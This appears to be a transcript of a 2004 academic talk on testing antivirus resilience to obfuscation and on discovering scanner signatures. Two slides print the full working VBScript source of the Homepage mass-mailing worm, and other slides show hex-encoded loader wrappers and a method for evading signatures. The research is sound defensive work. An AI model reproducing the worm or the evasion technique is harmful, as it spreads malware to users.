mihai christodorescu somesh jhajuly 12, 2004 mihai christodorescu university of wisconsin, madison...
TRANSCRIPT
Testing Malware Detectors
Mihai ChristodorescuSomesh Jha
Wisconsin Safety Analyzerhttp://www.cs.wisc.edu/wisaUniversity of Wisconsin, Madison
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
2
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
3
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
4
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
5
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
6
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
7
Introduction
A malware detector identifies malicious content (data, code).
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
8
Attack Model
An attacker tries to make malware appear benign.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
9
Evasive Maneuvers
Obfuscation: same functionality, different form.
Malware writers have many tools at their disposal
Blackhat tools: MISTFALL, CB Mutate, ...Commercial tools: Cloakware, PECompact, ...
Example: the Beagle worm family
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
10
Renaming ObfuscationFragment of Homepage e-mail worm:On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
11
Renaming ObfuscationFragment of Homepage e-mail worm:On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
InF FSO
OutF FSO
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
12
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
InF
Renaming Obfuscation
FSO
OutF FSO
On Error Resume Next...Set will=rumor.OpenTextFile(WScript.ScriptFullname,1)...Set ego=rumor.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
Obfuscated fragment of Homepage e-mail worm:
Fragment of Homepage e-mail worm:
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
13
Encapsulation ObfuscationFragment of the Homepage worm:On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
14
Encapsulation ObfuscationFragment of the Homepage worm:
Obfuscated fragment of the Homepage worm:Execute( decode( "4F6E20457272...6F7220526573" ) )...Execute( decode( "66657226496E...462E52656164" ) )...Execute( decode( "4C696E652676...6263726C660A" ) )
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
15
Encapsulation ObfuscationFragment of the Homepage worm:
Obfuscated fragment of the Homepage worm:Execute( decode( "4F6E20457272...6F7220526573" ) )...Execute( decode( "66657226496E...462E52656164" ) )...Execute( decode( "4C696E652676...6263726C660A" ) )
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
"4F6E20457272...6F7220526573"
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
16
Encapsulation Obfuscation
Execute( decode( "4F6E20457272...6F7220526573" ) )...Execute( decode( "66657226496E...462E52656164" ) )...Execute( decode( "4C696E652676...6263726C660A" ) )
Fragment of the Homepage worm:
Obfuscated fragment of the Homepage worm:decode( "4F6E20457272...6F7220526573" )
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
17
Encapsulation Obfuscation
Execute( decode( "4F6E20457272...6F7220526573" ) )...Execute( decode( "66657226496E...462E52656164" ) )...Execute( decode( "4C696E652676...6263726C660A" ) )
Fragment of the Homepage worm:
Obfuscated fragment of the Homepage worm:
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
Execute( decode( "4F6E20457272...6F7220526573" ) )
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
18
Encapsulation ObfuscationFragment of the Homepage worm:
Obfuscated fragment of the Homepage worm:Execute( decode( "4F6E20457272...6F7220526573" ) )...Execute( decode( "66657226496E...462E52656164" ) )...Execute( decode( "4C696E652676...6263726C660A" ) )
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
19
How Detection Works
Misuse detectors are malware detectors that use signatures to identify malicious code.
In this talk: generic method illustrated with virus scanner and worm examples.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
20
How Detection Works
Misuse detectors are malware detectors that use signatures to identify malicious code.
In this talk: generic method illustrated with virus scanner and worm examples.
On Error Resume Next...Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)...Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
McAfee VirusScan signature for the Homepage worm:
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
21
How Detection WorksOn Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)
Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop
Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing
If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If
Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next
Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If
Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
Set Contact = ListIndex.AddressEntries(Count)
Mail.To = Contact.Address
Mail.Subject = "Homepage"
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
Set Attachment=Mail.Attachments
Attachment.Add Folder & "\homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
If Mail.To <> "" Then
Mail.Send
WS.regwrite "HKCU\software\An\mailed", "1"
End If
Next
End If
Next
End if
End Function
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
22
How Detection WorksOn Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)
Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop
Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing
If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If
Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next
Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If
Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
Set Contact = ListIndex.AddressEntries(Count)
Mail.To = Contact.Address
Mail.Subject = "Homepage"
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
Set Attachment=Mail.Attachments
Attachment.Add Folder & "\homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
If Mail.To <> "" Then
Mail.Send
WS.regwrite "HKCU\software\An\mailed", "1"
End If
Next
End If
Next
End if
End Function
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
23
Testing Goal: ResilienceMotivation:
Obfuscation libraries are plentiful.Worm families use incremental obfuscations.
Need to assess resilience to obfuscation.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
24
Testing Goal: ResilienceMotivation:
Obfuscation libraries are plentiful.Worm families use incremental obfuscations.
Need to assess resilience to obfuscation.
Current AV certification is inadequate.Checks only detection of existing malware at a given point in time.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
25
Testing Goal: ResilienceQuestion 1:
How resistant is a virus scanner to obfuscations or variants of known worms?
Question 2:Using the limitations of a virus scanner, can a blackhat determine its detection algorithm?
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
26
Testing Methodology
1. Random testing for resilience assessment
Use obfuscation transformations to generate worm instances to be used as test samples.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
27
Testing Methodology
1. Random testing for resilience assessment
Use obfuscation transformations to generate worm instances to be used as test samples.
2. Adaptive testing for signature discoveryUse virus scanner detection rates on obfuscated worm instances to learn the signature employed.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
28
Roadmap
IntroductionGoalsTesting resilience to obfuscationSignature discoveryFuture workConclusions
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
29
1. Random testing
ObfuscationAlgorithmObfuscationAlgorithmObfuscationAlgorithmObfuscationAlgorithm
ParameterGenerator
ObfuscatedWorm
VirusScanner
Worm
Detected /Not detected
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
30
1. Random testing
ObfuscationAlgorithmObfuscationAlgorithmObfuscationAlgorithmObfuscationAlgorithm
ParameterGenerator
ObfuscatedWorm
VirusScanner
Worm
Detected /Not detected
Variable renamingCode encapsulationGarbage insertionCode reordering
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
31
1. Random testingOriginal worm
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
32
1. Random testingOriginal worm
Obfuscated instances
Renaming
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
33
1. Random testingOriginal worm
Obfuscated instances
Renaming
Reordering
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
34
1. Random testingOriginal worm
Obfuscated instances
Renaming
Reordering
Garbageinsertion
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
35
1. Random testingOriginal worm
Obfuscated instances
4432Total
512Not detected
3390Detected
Homepage worm in Norton AV
Renaming
Reordering
Garbageinsertion
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
36
1. Random testingOriginal worm
Obfuscated instances
4432Total
512Not detected
3390Detected
Homepage worm in Norton AV
Renaming
Reordering
Garbageinsertion
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
37
1. Random testingOriginal worm
Obfuscated instances
4432Total
512Not detected
3390Detected
Homepage worm in Norton AV
False Negative Rate: 11.5%
Renaming
Reordering
Garbageinsertion
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
38
False Negative Rate
0%5%
0%
25%
50%
75%
100%
Melissa Tune Chantal AnnaKournikova
Homepage Lucky2 GaScript Yovp
Norton AntiVirus Sophos Antiv irus M cAfee Virus Scan
by Worm
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
39
False Negative Rate
0%5%
0%
25%
50%
75%
100%
Melissa Tune Chantal AnnaKournikova
Homepage Lucky2 GaScript Yovp
Norton AntiVirus Sophos Antiv irus M cAfee Virus Scan
by WormSophos cannot cope with obfuscations.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
40
False Negative Rate
0%5%
0%
25%
50%
75%
100%
Melissa Tune Chantal AnnaKournikova
Homepage Lucky2 GaScript Yovp
Norton AntiVirus Sophos Antiv irus M cAfee Virus Scan
by Worm
No improvement over time.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
41
False Negative Rate
75%
53%
13%
38%
13%
72%
0%5%
0%
25%
50%
75%
100%
Melissa Tune Chantal AnnaKournikova
Homepage Lucky2 GaScript Yovp
Norton AntiVirus Sophos Antivirus McAfee Virus Scan
by Worm
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
42
False Negative Rate
75%
53%
13%
38%
13%
72%
0%5%
0%
25%
50%
75%
100%
Melissa Tune Chantal AnnaKournikova
Homepage Lucky2 GaScript Yovp
Norton AntiVirus Sophos Antivirus McAfee Virus Scan
by WormWild variation in false negative rates.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
43
False Negative Rate
1%0%
25%
50%
75%
100%
Variablerenaming
Hexadecimalencoding
Codereordering
Garbageinsertion
Norton AntiVirus Sophos Antivirus McAfee Virus Scan
by Obfuscation
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
44
False Negative Rate
1%0%
25%
50%
75%
100%
Variablerenaming
Hexadecimalencoding
Codereordering
Garbageinsertion
Norton AntiVirus Sophos Antivirus McAfee Virus Scan
by Obfuscation
Variable renaming handled very well.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
45
False Negative Rate
1%0%
25%
50%
75%
100%
Variablerenaming
Hexadecimalencoding
Codereordering
Garbageinsertion
Norton AntiVirus Sophos Antivirus McAfee Virus Scan
by ObfuscationDetection fails for both encapsulation
and reordering.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
46
Roadmap
IntroductionGoalsTesting resilience to obfuscationSignature discoveryFuture workConclusions
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
47
2. Adaptive Testing
Signature discovery algorithm finds the Kmalware statements that, when obfuscated, create an undetectable malware variant.
KK-1…21
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
48
2. Adaptive Testing
Signature discovery algorithm finds the Kmalware statements that, when obfuscated, create an undetectable malware variant.
We need an opaque obfuscation transformation.
KK-1…21
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
49
Signature Discovery
OpaqueObfuscation
ParameterGenerator
ObfuscatedWorm
VirusScanner
Worm
Detected /Not detected
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
50
Signature Discovery
OpaqueObfuscation
ParameterGenerator
ObfuscatedWorm
VirusScanner
Worm
Detected /Not detected
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
51
Signature Discovery AlgorithmOriginal worm
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
52
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
53
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance Not detected
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
54
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
55
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Not detected
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
56
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Not detected
3rd obfuscated instance
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
57
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Not detected
3rd obfuscated instance Detected
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
58
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Not detected
3rd obfuscated instance Detected
4th obfuscated instance
SS
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
59
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Not detected
3rd obfuscated instance Detected
4th obfuscated instance Not detected
SS
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
60
Signature Discovery Algorithm
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Done.
Not detected
3rd obfuscated instance Detected
4th obfuscated instance Not detected
SS
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
61
Signature Discovery Algorithm
One signature element found in O(log N).
SS
Original worm
1st obfuscated instance
2nd obfuscated instance
Not detected
Done.
Not detected
3rd obfuscated instance Detected
4th obfuscated instance Not detected
SS
SS
SS
SS
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
62
Signature Discovery Algorithm
By biasing the search towards the left, we can find the leftmost signature element.
S
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
63
Signature Discovery Algorithm
By biasing the search towards the left, we can find the leftmost signature element.
S
Search range for second signature element.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
64
Signature Discovery Algorithm
By biasing the search towards the left, we can find the leftmost signature element.
Worst running time: O( K log N )
S
Search range for second signature element.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
65
Discovered Signatures
Worm sample: Homepage
On Error Resume NextSet InF = FSO.OpenTextFile(
WScript.ScriptFullname, 1 )Set OutF = FSO.OpenTextFile( Folder &
"\homepage.HTML.vbs", 2, true )
Sophos Antivirus
The whole body of the malware.
McAfee Virus Scan
Attachment.Add Folder & "\homepage.HTML.vbs"
Norton AntiVirus
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
66
Discovered Signatures
Worm sample: Homepage
On Error Resume NextSet InF = FSO.OpenTextFile(
WScript.ScriptFullname, 1 )Set OutF = FSO.OpenTextFile( Folder &
"\homepage.HTML.vbs", 2, true )
Sophos Antivirus
The whole body of the malware.
McAfee Virus Scan
Attachment.Add Folder & "\homepage.HTML.vbs"
Norton AntiVirus
aHomepage
Norton AntiVirusSophos AntivirusMcAfee Virus Scan
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
67
What If...
A virus writer uses signature information to thwart virus scanners.
Each virus variant can now evade detection.Viruses can repeatedly try to enter a system, learning the signature in the process.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
68
Roadmap
IntroductionGoalsTesting resilience to obfuscationSignature discoveryFuture workConclusions
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
69
Future Work
Binary viruses.Same obfuscation techniques apply.Binary rewriting library – work in progress.
Refine the signature discovery algorithm.Search below instruction level.Detect more powerful signature classes.
July 12, 2004 Mihai ChristodorescuUniversity of Wisconsin, Madison
70
Conclusions
Obfuscation-based testing techniques are useful in comparing virus scanners.
Commercial virus scanners have poor resilience to common obfuscation transformations.
Testing Malware Detectors
Mihai ChristodorescuSomesh Jha
Wisconsin Safety Analyzerhttp://www.cs.wisc.edu/wisaUniversity of Wisconsin, Madison